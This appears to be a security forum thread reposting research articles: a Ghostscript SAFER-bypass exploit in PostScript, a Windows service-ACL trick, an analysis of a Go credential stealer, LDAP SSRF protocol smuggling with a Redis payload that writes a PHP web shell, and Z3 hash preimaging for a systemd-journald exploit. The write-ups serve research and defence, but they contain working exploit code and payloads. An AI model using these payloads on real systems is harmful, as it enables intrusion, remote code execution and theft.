to change its type to string and read off the address of the zput function. %make a large enough array and change its type with pop /arr 32767 array def %get the address of the put operator systemdict /put get arr exch 0 exch put %store arr as 39th element of pinst and modify its type pinst 39 arr put %Create the argument to setpattern /impl 100 dict def impl /Implementation [pinst] put %Change type of arr to string 0 1 1291 {impl setpattern} for % Print the address of zput as string pinst 39 get 8 8 getinterval It is a bit unfortunate that the type_attrs value for array is 0x4 while the value for string is 0x12, so I have to underflow the ushort to go from array to string, which is why I have to do impl setpattern 1291 times. As can be seen in the screenshot above, the fake array gets converted into a string and I get the address of zput. I actually have to run it outside of gdb or at least enable address randomization to get it work, as gdb seem to always allocate arr at 0x7ffff0a35078, but with memory randomization, I've not failed a single time with the above. I can also use this to write bytes to any position in arr. Sandbox bypass Now that I can read and write arbitrary bytes from an arbitrary PostScript object, it is just a matter of deciding what is the easiest thing to do. My original plan was to simply overwrite the LockFilePermissions parameter, and then call file, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I also need to fake a number of other objects in the execution context i_ctx_p, which seems too complicated. Instead, I'm just going to call a simple but powerful function that I am not supposed to have access to in SAFER mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput (also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely. Summarizing, here is what I need to do now: Create a fake operand stack with arguments that I want to supply to forceput; Overwrite the location in pinst that stores the address of the operand stack pointer to the address of what I created above; Get the address of forceput and replace pinst->type.procs.getpattern with its address. To achieve (1), recall that the operand stack is nothing more than an array of ref. To fake it, I just need to create an array with my arguments: /operand 3 array def operand 0 userparams put operand 1 /LockFilePermissions put operand 2 false put I can then store it in arr to retrieve the address to this array. Instead of using arr, I'm just going to reuse pinst and put it in the 31st element instead: pinst 31 operand 2 1 getinterval put Note that instead of putting operand into the 31st element of pinst, I create a new array starting from operand[2] and use that new array. This is because PostScript functions looks for their arguments by going down the operand stack, so I need to set it up so that when osp decreases, it will get my other arguments. Using the trick in the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst. This then sets up pinst for calling forceput. Although forceput is not accessible from SAFER mode, I can simply take the address of zput, and add its offset to zforceput to obtain the address of zforceput (as this offset is not randomized). In the debug binary compiled with commit 81f3d1e, this offset is 0x437 and in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0. After doing this, I can simply call a restore to write the new LockFilePermissions parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON). Here's a screenshot of the launching of a calculator from sandboxed Ghostscript: By overwriting other entries in userparams, such as PermitFileReading and PermitFileWriting, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don't stop a specially-crafted PDF file from wiping a user's entire home directory when opened. Or, if you're in a more forgiving mood, you could delete all files from a user's desktop and subsequently flood it with Super Mario bricks: https://youtube.com/watch?v=5vVxN-vfCsI For more videos about our security research and exploits, please visit the Semmle YouTube channel. If you'd like to run your own QL queries on open source software: you can! We've made our QL technology freely available for running queries on open source projects that have been analyzed by LGTM.com. At the time of writing, LGTM.com has analyzed around 130,000 GitHub, Bitbucket, and GitLab repositories. For each of these projects, you can download a code snapshot from LGTM.com for running queries. In addition, you'll need the QL for Eclipse plugin. Unfortunately Ghostscript is not developed on GitHub.com and has therefore not been analyzed by LGTM.com. We've therefore made the Ghostscript code snapshot available here. Sursa: https://lgtm.com/blog/ghostscript_CVE-2018-19134_exploit?
  5. Introducing Armory: External Pentesting Like a Boss Posted by Dan Lawson on February 04, 2019 Link TLDR; We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database and use the new data to supply targets for other tools. Why? Over the past few years I’ve spent a lot of time conducting some relatively large-scale external penetration tests. This ends up being a massive exercise in managing various text files, with a moderately unhealthy dose of grep, cut, sed, and sort. It gets even more interesting as you discover new domains, new IP ranges or other new assets and must start the entire process over again. Long story short, I realized that if I could automate handling the data, my time would be freed up for actual testing and exploitation. So, Armory was born. What? Armory is written in Python. It works with both Python2 and Python3. It is composed of the main application, as well as modules and reports. Modules are wrapper scripts that run public (or private) tools using either data from the command line or from data in the database. The results of this are then either processed and imported into the database or just left in their text files for manual perusal. The database handles the following types of data: BaseDomains: Base domain names, mainly used in domain enumeration tools Domains: All discovered domains (and subdomains) IPs: IP addresses discovered CIDRs: CIDRs, along with owners that these IP addresses reside in, pulled from whois data ScopeCIDRs: CIDRs that are explicitly added are in scope. This is separated out from CIDRs since many times whois servers will return much larger CIDRs then may belong to a target/customer. Ports: Port numbers and services, usually populated by Nmap, Nessus, or Shodan Users: Users discovered via various means (leaked cred databases, LinkedIn, etc.) Creds: Sets of credentials discovered Additionally, with Basedomains, Domains and IPs you have two types of scoping: Active scope: Host is in scope and can have bad-touch tools run on it (i.e. nmap, gobuster, etc.). Passive scope: Host isn’t directly in scope but can have enumeration tools run against it (i.e. aquatone, sublist3r, etc.). If something is Active Scoped, it should also be Passive Scoped. The main purpose of Passive scoping is to handle situations where you may want data ingested into the database and the data may be useful to your customers, but you do not want to actively attack those targets. Take the following scenario: You are doing discovery and an external penetration test for a client trying to find out all of their assets. You find a few dozen random domains registered to that client but you are explicitly scoped to the subnets that they own. During the subdomain enumeration, you discover multiple development web servers hosted on Digital Ocean. Since you do not have permission to test against Digital Ocean, you don't want to actively attack it. However, this would still be valuable information for the client to receive. Therefore you can leave those hosts scoped Passive and you will not run any active tools on it. You can still generate reports later on including the passive hosts, thereby still capturing the data without breaking scope. Detalii complete: https://depthsecurity.com/blog/introducing-armory-external-pentesting-like-a-boss
      • 1
      • Thanks
  6. Posted on February 7, 2019 Demystifying Windows Service “permissions” configuration Some days ago, I was reflecting on the SeRestorePrivilege and wondering if a user with this privilege could alter a Service Access, for example: grant to everyone the right to stop/start the service, during a “restore” task. (don’t expect some cool bypass or exploit here) As you probably know, each object in Windows has DACL’s & SACL’s which can be configured. The most “intuitive” are obviously files and folder permissions but there are a plenty of other securable objects https://docs.microsoft.com/en-us/windows/desktop/secauthz/securable-objects Given that our goal is Service permissions, first we will try to understand how they work and how we can manipulate them. Service security can be split into 2 parts: Access Rights for the Service Control Manager Access Rights for a Service We will focus on Access Rights for the service, which means who can start/stop/pause service and so on. For detailed explanation take a look at this article from Microsoft: https://docs.microsoft.com/it-it/windows/desktop/Services/service-security-and-access-rights How can we change the service security settings? Configuring Service Security and Access Rights is not so an immediate task like, for example, changing DACL’s of file or folder objects. Keep also in mind that it is limited only to privileged users like Administrators and SYSTEM account. There are some built-in and third party tools which permits changing the DACL’s of a service, for example: Windows “sc.exe”. This program has a lot of options and with “sdset” it is possible to modifiy the security setting of a service, but you have to specify it in the cryptic SDDL (Security Description Definition Language). The opposite command “sdshow” will list the SDDL: Note that interactive user (IU) cannot start or stop the BITS service because the necessary rights (RP,WP) are missing. I’m not going to explain in deep this stuff, if interested look here: https://support.microsoft.com/en-us/help/914392/best-practices-and-guidance-for-writers-of-service-discretionary-acces subinacl.exe from Windows Resource Kit. This one is much more easier to use. In this example we will grant to everyone the right to start the BITS (Backgound intelligent transfer service) Service Security Editor , a free GUI Utility to set permissions for any Windows Service: And of course, via Group Policy, powershell, etc.. All these tools and utilities relies on this Windows API call, accessible only to high privileged users: BOOL SetServiceObjectSecurity( SC_HANDLE hService, SECURITY_INFORMATION dwSecurityInformation, PSECURITY_DESCRIPTOR lpSecurityDescriptor ); Where are the service security settings stored? Good question! First of all, we have to keep in mind that services have a “default” configuration: Administrators have full control, standard users can only interrogate the service, etc.. Services with non default configuration have their settings stored in the registry under this subkey: HKLM\System\CurrentControlSet\Services\<servicename>\security This subkey hosts a REG_BINARY key which is the binary value of the security settings: These “non default” registry settings are read when the Service Control Manager starts (upon boot) and stored in memory. If we change the service security settings with one of the tools we mentioned before, changes are immediately applied and stored in memory. During the shutdown process, the new registry values are written. And the Restore Privilege? You got it! With the SeRestorePrivilege, even if we cannot use the SetServiceObjectSecurity API call, we can restore registry keys, including the security subkey… Let’s make an example: we want to grant to everyone full control over BITS service On our Windows test machine, we just modify the settings with one of the tools: After that, we restart our box and copy the new binary value of the security key: Now that we have the right values, we just need to “restore” the security key with these. For this purpose we are going to use a small “C” program, here the relevant part: byte data[] = { 0x01, 0x00, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x00, 0xb4, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00, 0x02, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0xc0, 0x18, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x02, 0x00, 0x70, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x02, 0x14, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x8d, 0x01, 0x02, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x8d, 0x01, 0x02, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x06, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00 }; LSTATUS stat = RegCreateKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\BITS\\Security", 0, NULL, REG_OPTION_BACKUP_RESTORE, KEY_SET_VALUE, NULL, &hk, NULL); stat = RegSetValueExA(hk, "security", 0, REG_BINARY, (const BYTE*)data,sizeof(data)); if (stat != ERROR_SUCCESS) { printf("[-] Failed writing!", stat); exit(EXIT_FAILURE); } printf("Setting registry OK\n"); We need of course to enable the SE_RESTORE_NAME privilege before in our process token. In an elevated shell, we execute the binary on the victim machine: and after the reboot we are able to start BITS even with a low privileged user: And the Take Onwer Privilege? The concept is the same, we need to take the ownership of the registry key before, grant the necessary access rights (SetNamedSecuityInfo() API calls) on the key and then do the same trick we have seen before. But wait, one moment! What if we take the onwersip of the service? dwRes = SetNamedSecurityInfoW( pszService, SE_SERVICE, OWNER_SECURITY_INFORMATION, takeownerboss_sid, NULL, NULL, NULL); Yes, this works, but when we set the permissions on the object (again with SetNamedSecurityInfo) we get an error. If we do this with admin rights, it works… Probably the function will call the underlying SetServiceObjectSecurity which modifies the permissions of the service stored “in memory” and this is precluded to non admins. Final thoughts So we were able to change the Service Access Rights with our “restoreboss” user. Nothing really useful i think, but sometimes it’s just fun to try to understand some parts of the Windows internal mechanism, do you agree? Sursa: https://decoder.cloud/2019/02/07/demystifying-windows-service-permissions-configuration/
  7. Analyzing a new stealer written in Golang Posted: January 30, 2019 by hasherezade Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++. Recently, a new variant of Zebocry malware was observed that was written in Go (detailed analysis available here). We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go. Analyzed sample This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go: 992ed9c632eb43399a32e13b9f19b769c73d07002d16821dde07daa231109432 513224149cd6f619ddeec7e0c00f81b55210140707d78d0e8482b38b9297fc8f 941330c6be0af1eb94741804ffa3522a68265f9ff6c8fd6bcf1efb063cb61196 – HyperCheats.rar (original package) 3fcd17aa60f1a70ba53fa89860da3371a1f8de862855b4d1e5d0eb8411e19adf – HyperCheats.exe (UPX packed) 0bf24e0bc69f310c0119fc199c8938773cdede9d1ca6ba7ac7fea5c863e0f099 – unpacked Behavioral analysis Under the hood, Golang calls WindowsAPI, and we can trace the calls using typical tools, for example, PIN tracers. We see that the malware searches files under following paths: "C:\Users\tester\AppData\Local\Uran\User Data\" "C:\Users\tester\AppData\Local\Amigo\User\User Data\" "C:\Users\tester\AppData\Local\Torch\User Data\" "C:\Users\tester\AppData\Local\Chromium\User Data\" "C:\Users\tester\AppData\Local\Nichrome\User Data\" "C:\Users\tester\AppData\Local\Google\Chrome\User Data\" "C:\Users\tester\AppData\Local\360Browser\Browser\User Data\" "C:\Users\tester\AppData\Local\Maxthon3\User Data\" "C:\Users\tester\AppData\Local\Comodo\User Data\" "C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\" "C:\Users\tester\AppData\Local\Vivaldi\User Data\" "C:\Users\tester\AppData\Roaming\Opera Software\" "C:\Users\tester\AppData\Local\Kometa\User Data\" "C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\" "C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\" "C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\" "C:\Users\tester\AppData\Local\Orbitum\User Data\" "C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\" "C:\Users\tester\AppData\Local\K-Melon\User Data\" Those paths point to data stored from browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia. The next searched path is for the desktop: "C:\Users\tester\Desktop\*" All files found there are copied to a folder created in %APPDATA%: The folder “Desktop” contains all the TXT files copied from the Desktop and its sub-folders. Example from our test machine: After the search is completed, the files are zipped: We can see this packet being sent to the C&C (cu23880.tmweb.ru/landing.php): Inside Golang compiled binaries are usually big, so it’s no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX. As a result, we get plain Go binary. The export table reveals the compilation path and some other interesting functions: Looking at those exports, we can get an idea of the static libraries used inside. Many of those functions (trampoline-related) can be found in the module sqlite-3: https://github.com/mattn/go-sqlite3/blob/master/callback.go. Function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go). Tools For the analysis, I used IDA Pro along with the scripts IDAGolangHelper written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File –> script file). We then see the following menu, giving access to particular features: First, we need to determine the Golang version (the script offers some helpful heuristics). In this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before and after using the scripts. Before (only the exported functions are named): After (most of the functions have their names automatically resolved and added): Many of those functions comes from statically-linked libraries. So, we need to focus primarily on functions annotated as main_* – that are specific to the particular executable. Code overview In the function “main_init”, we can see the modules that will be used in the application: It is statically linked with the following modules: GRequests (https://github.com/levigross/grequests) go-sqlite3 (https://github.com/mattn/go-sqlite3) try (https://github.com/manucorporat/try) Analyzing this function can help us predict the functionality; i.e. looking the above libraries, we can see that they will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggests using regular expressions, zip format, and reading environmental variables. This function is also responsible for initializing and mapping strings. We can see that some of them are first base64 decoded: In string initializes, we see references to cryptocurrency wallets. Ethereum: Monero: The main function of Golang binary is annotated “main_main”. Here, we can see that the application is creating a new directory (using a function os.Mkdir). This is the directory where the found files will be copied. After that, there are several Goroutines that have started using runtime.newproc. (Goroutines can be used similarly as threads, but they are managed differently. More details can be found here). Those routines are responsible for searching for the files. Meanwhile, the Sqlite module is used to parse the databases in order to steal data. Then, the malware zips it all into one package, and finally, the package is uploaded to the C&C. What was stolen? To see what exactly which data the attacker is interested in, we can see look more closely at the functions that are performing SQL queries, and see the related strings. Strings in Golang are stored in bulk, in concatenated form: Later, a single chunk from such bulk is retrieved on demand. Therefore, seeing from which place in the code each string was referenced is not-so-easy. Below is a fragment in the code where an “sqlite3” database is opened (a string of the length 7 was retrieved): Another example: This query was retrieved from the full chunk of strings, by given offset and length: Let’s take a look at which data those queries were trying to fetch. Fetching the strings referenced by the calls, we can retrieve and list all of them: select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards select * FROM autofill_profiles select email FROM autofill_profile_emails select number FROM autofill_profile_phone select first_name, middle_name, last_name, full_name FROM autofill_profile_names We can see that the browser’s cookie database is queried in search data related to online transactions: credit card numbers, expiration dates, as well as personal data such as names and email addresses. The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger. Software\\Classes\\tdesktop.tg\\shell\\open\\command \\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\ \\AppData\\Roaming\\Electrum\\wallets\\default_wallet \\AppData\\Local\\Torch\\User Data\\ \\AppData\\Local\\Uran\\User Data\\ \\AppData\\Roaming\\Opera Software\\ \\AppData\\Local\\Comodo\\User Data\\ \\AppData\\Local\\Chromium\\User Data\\ \\AppData\\Local\\Chromodo\\User Data\\ \\AppData\\Local\\Kometa\\User Data\\ \\AppData\\Local\\K-Melon\\User Data\\ \\AppData\\Local\\Orbitum\\User Data\\ \\AppData\\Local\\Maxthon3\\User Data\\ \\AppData\\Local\\Nichrome\\User Data\\ \\AppData\\Local\\Vivaldi\\User Data\\ \\AppData\\Roaming\\BBQCoin\\wallet.dat \\AppData\\Roaming\\Bitcoin\\wallet.dat \\AppData\\Roaming\\Ethereum\\keystore \\AppData\\Roaming\\Exodus\\seed.seco \\AppData\\Roaming\\Franko\\wallet.dat \\AppData\\Roaming\\IOCoin\\wallet.dat \\AppData\\Roaming\\Ixcoin\\wallet.dat \\AppData\\Roaming\\Mincoin\\wallet.dat \\AppData\\Roaming\\YACoin\\wallet.dat \\AppData\\Roaming\\Zcash\\wallet.dat \\AppData\\Roaming\\devcoin\\wallet.dat Big but unsophisticated malware Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar. It has similar targets and also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is somehow linked with those cases. When we take a look at the implementation as well as the functionality of this malware, it’s rather simple. Its big size comes from many statically-compiled modules. Possibly, this malware is in the early stages of development— its author may have just started learning Go and is experimenting. We will be keeping eye on its development. At first, analyzing a Golang-compiled application might feel overwhelming, because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect that the tools to analyze it will mature with time. Is malware written in Go an emerging trend in threat development? It’s a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community. Sursa: https://blog.malwarebytes.com/threat-analysis/2019/01/analyzing-new-stealer-written-golang/
      • 2
      • Upvote
  8. SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP SSRF protocol smuggling involves an attacker injecting one TCP protocol into a dissimilar TCP protocol. A classic example is using gopher (i.e. the first protocol) to smuggle SMTP (i.e. the second protocol): 1 gopher://127.0.0.1:25/%0D%0AHELO%20localhost%0D%0AMAIL%20FROM%3Abadguy@evil.com%0D%0ARCPT%20TO%3Avictim@site.com%0D%0ADATA%0D%0A .... The keypoint above is the use of the CRLF character (i.e. %0D%0A) which breaks up the commands of the second protocol. This attack is only possible with the ability to inject CRLF characters into a protocol. Almost all LDAP client libraries support plaintext authentication or a non-ssl simple bind. For example, the following is an LDAP authentication example using Python 2.7 and the python-ldap library: 1 2 3 import ldap conn = ldap.initialize("ldap://[SERVER]:[PORT]") conn.simple_bind_s("[USERNAME]", "[PASSWORD]") In many LDAP client libraries it is possible to insert a CRLF inside the username or password field. Because LDAP is a rather plain TCP protocol this makes it immediately of note. 1 2 3 import ldap conn = ldap.initialize("ldap://0:9000") conn.simple_bind_s("1\n2\n\3\n", "4\n5\n6---") You can see the CRLF characters are sent in the request: 1 2 3 4 5 6 7 8 9 # nc -lvp 9000 listening on [::]:9000 ... connect to [::ffff:127.0.0.1]:9000 from localhost:39250 ([::ffff:127.0.0.1]:39250) 0`1 2 3 4 5 6--- Real World Example Imagine the case where the user can control the server and the port. This is very common in LDAP configuration settings. For example, there are many web applications that support LDAP configuration as a feature. Some common examples are embedded devices (e.g. webcam, routers), Multi-Function Printers, multi-tenancy environments, and enterprise appliances and applications. Putting It All Together If a user can control the server/port and CRLF can be injected into the username or password, this becomes an interesting SSRF protocol smuggle. For example, here is a Redis Remote Code Execution payload smuggled completely inside the password field of the LDAP authentication in a PHP application. In this case the web root is ‘/app’ and the Redis server would need to be able to write the web root: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php $adServer = "ldap://127.0.0.1:6379"; $ldap = ldap_connect($adServer); # RCE smuggled in the password field $password = "_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A %0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A %243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%244%0D%0A/app%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A %2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A"; $ldaprdn = 'domain' . "\\" . "1\n2\n3\n"; ldap_set_option($ldap, LDAP_OPT_PROTOCOL_VERSION, 3); ldap_set_option($ldap, LDAP_OPT_REFERRALS, 0); $bind = @ldap_bind($ldap, $ldaprdn, urldecode($password)); ?> Client Libraries In my opinion, the client library is functioning correctly by allowing these characters. Rather, it’s the application’s job to filter username and password input before passing it to an LDAP client library. I tested out four LDAP libraries that are packaged with common languages all of which allow CRLF in the username or password field: Library Tested In python-ldap Python 2.7 com.sun.jndi.ldap JDK 11 php-ldap PHP 7 net-ldap Ruby 2.5.2 ——- ——– Summary Points • If you are an attacker and find an LDAP configuration page, check if the username or password field allows CRLF characters. Typically the initial test will involve sending the request to a listener that you control to verify these characters are not filtered. • If you are defender, make sure your application is filtering CRLF characters (i.e. %0D%0A) Blackhat USA 2019 @AndresRiancho and I (@0xrst) have an outstanding training coming up at Blackhat USA 2019. There are two dates available and you should join us!!! It is going to be fun. Sursa: https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/
      • 1
      • Upvote
  9. Justin Steven Publicat pe 6 feb. 2019 https://twitch.tv/justinsteven In this strewam we rework our exploit for the 64-bit split write4 binary from ROP Emporium (https://ropemporium.com/) - and in doing so we get completely nerd-sniped by a strange ret2system crash.
  10. idenLib - Library Function Identification When analyzing malware or 3rd party software, it's challenging to identify statically linked libraries and to understand what a function from the library is doing. idenLib.exe is a tool for generating library signatures from .lib files. idenLib.dp32 is a x32dbg plugin to identify library functions. idenLib.py is an IDA Pro plugin to identify library functions. Any feedback is greatly appreciated: @_qaz_qaz How does idenLib.exe generate signatures? Parse input file(.lib file) to get a list of function addresses and function names. Get the last opcode from each instruction and generate MD5 hash from it (you can change the hashing algorithm). Save the signature under the SymEx directory, if the input filename is zlib.lib, the output will be zlib.lib.sig, if zlib.lib.sig already exists under the SymEx directory from a previous execution or from the previous version of the library, the next execution will append different signatures. If you execute idenLib.exe several times with different version of the .lib file, the .sig file will include all unique function signatures. Signature file format: hash function_name Generating library signatures x32dbg, IDAPro plugin usage: Copy SymEx directory under x32dbg/IDA Pro's main directory Apply signatures: x32dbg: IDAPro: Only x86 is supported (adding x64 should be trivial). Useful links: Detailed information about C Run-Time Libraries (CRT); Credits Disassembly powered by Zydis Icon by freepik Sursa: https://github.com/secrary/idenLib
      • 1
      • Upvote
  11. Exploiting systemd-journald Part 2 February 6, 2019 By Nick Gregory Introduction This is the second part in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. In the first post, we covered how to communicate with journald, and built a simple proof-of-concept to exploit the vulnerability, using predefined constants for fixed addresses (with ASLR disabled). In this post, we explore how to compute the hash preimages necessary to write a controlled value into libc’s __free_hook as described in part one. This is an important step in bypassing ASLR, as the address of the target location to which we redirect execution (which is system in our case) will be changing between each instance of systemd-journald. Consequently, successful exploitation in the presence of ASLR requires computing a hash preimage dynamically to correspond with the respective address space of that instance of systemd-journald. How to disclose the location of system, and writing an exploit to completely bypass ASLR, are beyond the scope of this post. The Challenge As noted in the first blog post, we don’t directly control the data written to the stack after it has been lowered into libc’s memory – the actual values written are the result of hashing our journal entries with jenkins_hashlittle2. Since this is a function pointer we’re overwriting, we must have full 64 bit control of the hash output which can seem like a very daunting task at first, and would indeed be impractical if a cryptographically secure hash was used. However jenkins_hashlittle2 is not cryptographically secure, and we can use this property to generate preimages for any 64 bit output in just a few seconds. The Solution We can use a tool like Z3 to build a mathematical definition of the hash function and automatically generate an input which satisfies certain constraints (like the output being the address of system, and the input being constrained to valid entry format). Z3 Z3 is a theorem prover which gives us the ability to (among other things) easily model and solve logical constraints. Let’s take a look at how to use it by going through an example in the Z3 repo. In this example, we want to find if there exists an assignment for variables x and y so that the following conditions hold: x + y > 5 x > 1 y > 1 It is clear that more than one solutions exist to satisfy the above set of constraints. Z3 will inform us if the set constraints has a solution (is satisfiable), as well as provide us with one assignment to our variables that demonstrates satisfiability. Let’s see how Z3 can do so: from z3 import * x = Real('x') y = Real('y') s = Solver() s.add(x + y > 5, x > 1, y > 1) print(s.check()) print(s.model()) This simple example shows how to create variables (e.g. Real('x')), add the constraints that x + y > 5, x > 1, and y > 1 (s.add(x + y > 5, x > 1, y > 1)), check if the given state is satisfiable (i.e. there are values for x and y that satisfy all constraints), and get a set of values for x and y that satisfy the constraints. As expected, running this example yields: sat [y = 4, x = 2] meaning that the stated formula is satisfiable, and that y=4, x=2 is a solution that satisfies the equation. BitVectors Not only can Z3 represent arbitrary real numbers, but it can also represent fixed-width integers called BitVectors. We can use these to model some more interesting elements of low-level computing like integer wraparound: from z3 import * x = BitVec('x', 32) # Create a 32-bit wide variable, x y = BitVec('y', 32) s = Solver() s.add(x > 0, y > 0, x+y < 0) # Constrain x and y to be positive, but their sum to be negative print(s.check()) print(s.model()) A few small notes here: Adding two BitVecs of a certain size yields another BitVec of the same size Comparisons made by using < and > in Python result in signed comparisons being added to the solver constraints. Unsigned comparisons can be made using Z3-provided functions. And as we’d expect, sat [b = 2147451006, a = 2147451006] BitVecs give us a very nice way to represent the primitive C types, such as the ones we will need to model the hash function in order to create our preimages. Transformations Being able to solve simple equations is great, but in general we will want to reason on more complex operations involving variables. Z3’s Python bindings allow us to do this in an intuitive way. For instance (drawing from this Wikipedia example), if we wanted to find a fixed point in the equation f(x) = x2-3x+4, we can simply write: def f(x): return x**2 - 3*x + 4 x = Real('x') s = Solver() s.add(f(x) == x) s.check() s.model() This yields an expected result: sat x = 2 Lastly, it’s worth noting that Z3’s Python bindings provide pretty-printing for expressions. So if we print out f(x) in the above example, we get a nicely formatted representation of what f(x) is symbolically: x**2 - 3*x + 4 This just scratches the surface of what you can do with Z3, but it’s enough for us to begin using Z3 to model jenkins_hashlittle2, and create preimages for it. Modeling The Hash Function Input As noted above, all BitVectors in Z3 have a fixed size, and this is where we run into our first issue. Our hash function, jenkins_hashlittle2, takes a variable length array of input which can’t be modeled with a fixed length BitVec. So we first need to decide how long our input is going to be. Looking through the hash function’s source, we see that it chunks its input into 3 uint32_ts at a time, and operates on those. If this is a hash function that uniformly distributes its output, those 12 bytes of input should be enough to cover the 8 byte output space (i.e. all possible 8 byte outputs should be generated by one or more 12 byte input), so we should be able to use 12 bytes as our input length. This also has the benefit of never calling the hash’s internal state mixing function, which greatly reduces the complexity of the equations. length = 12 target = 0x7ffff7a33440 # The address of system() on our ASLR-disabled system s = Solver() key = BitVec('key', 8*length) Input Constraints Our input (key) has to satisfy several constraints. Namely, it must be a valid journald native entry. As we saw in part one, this means it should resemble “ENTRY_NAME=ENTRY_VALUE”. However there are some constraints on ENTRY_NAME that we must be taken into account (as checked by the journal_field_valid function): the name must be less than 64 characters, must start with [A-Z], and must only contain [A-Z0-9_]. The ENTRY_VALUE has no constraints besides not containing a newline character, however. To minimize the total number of constraints Z3 has to solve for, we chose to hard-code the entry format in our model as one uppercase character for the entry name, an equals sign, and then 10 ASCII-printable characters above the control character range for the entry value. To specify this in Z3, we will use the Extract function, which allows us to select slices of a BitVector, such that we can apply constraints to that slice. Extract takes three arguments: bit length, starting offset, and BitVector. char = Extract(7, 0, key) s.add(char >= ord('A'), char <= ord('Z')) # First character must be uppercase char = Extract(15, 8, key) s.add(char == ord('=')) # Second character must be ‘=’ for char_offset in range(16, 8*length, 8): char = Extract(char_offset + 7, char_offset, key) s.add(char >= 0x20, char <= 0x7e) # Subsequent characters must just be in the printable range Note: Z3’s Extract function is very un-Pythonic. It takes the high bit first (inclusive), then the low bit (inclusive), then the source BitVec to extract from. So Extract(7, 0, key) extracts the first byte from key. The Function Itself Now that we have our input created and constrained, we can model the function itself. First, we create our Z3 instance of the internal state variables uint32_t a, b, c using the BitVecVal class (which is just a way of creating a BitVec of the specified length with a predetermined value). The predetermined value is the same as in the hashing function, which is the constant 0xdeadbeef plus the length: initial_vaue = 0xdeadbeef + length a = BitVecVal(initial_value, 